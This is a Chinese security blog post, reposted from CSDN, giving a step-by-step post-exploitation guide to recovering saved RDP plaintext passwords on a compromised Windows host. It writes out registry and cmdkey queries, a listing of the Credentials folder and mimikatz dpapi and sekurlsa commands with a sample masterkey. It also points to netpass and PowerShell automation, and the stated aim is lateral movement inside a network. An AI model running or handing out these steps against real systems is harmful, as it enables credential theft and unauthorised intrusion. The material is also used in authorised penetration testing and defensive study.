酷帥王子'blog-思想激进者,一搞网络安全的市井小儿,随波逐流之辈也!

获取已控机器本地保存的RDP明文密码

2020-9-24 22:50 作者:酷帥王子 | 黑盒网络渗透测试 | 标签: 转载自https://blog.csdn.net/lhh134/article/details/104475654


0x01 简介

在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。

0x02 获取已控机器本地保存的RDP密码

一、mimikatz

1、查看本地机器本地连接过的目标机器。

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

vshapes=

2、查看本地用户此目录下是否存有RDP密码文件

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

vshapes=

查看保存在本地的远程主机信息

cmdkey /list

vshapes=

3、选择一个密码文件对其进行解密。此处需要记录下guidMasterKey的值,待会要通过guidMasterKey找对应的Masterkey

mimikatz # privilege::debug

mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\8781378F7D47006A4FC98D2F8A266F58

vshapes=

4、根据guidMasterKey找到对应的Masterkey

mimikatz # sekurlsa::dpapi

vshapes=

5、通过Masterkey解密出明文RDP连接密码。

mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d

vshapes=

二、netpass

下载:
netpass

vshapes=
使用:
双击netpass.exe
vshapes=

三、其他

powershell脚本自动化解密

 


文章作者:酷帥王子
文章地址:https://www.2k8.org:443/post-218.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.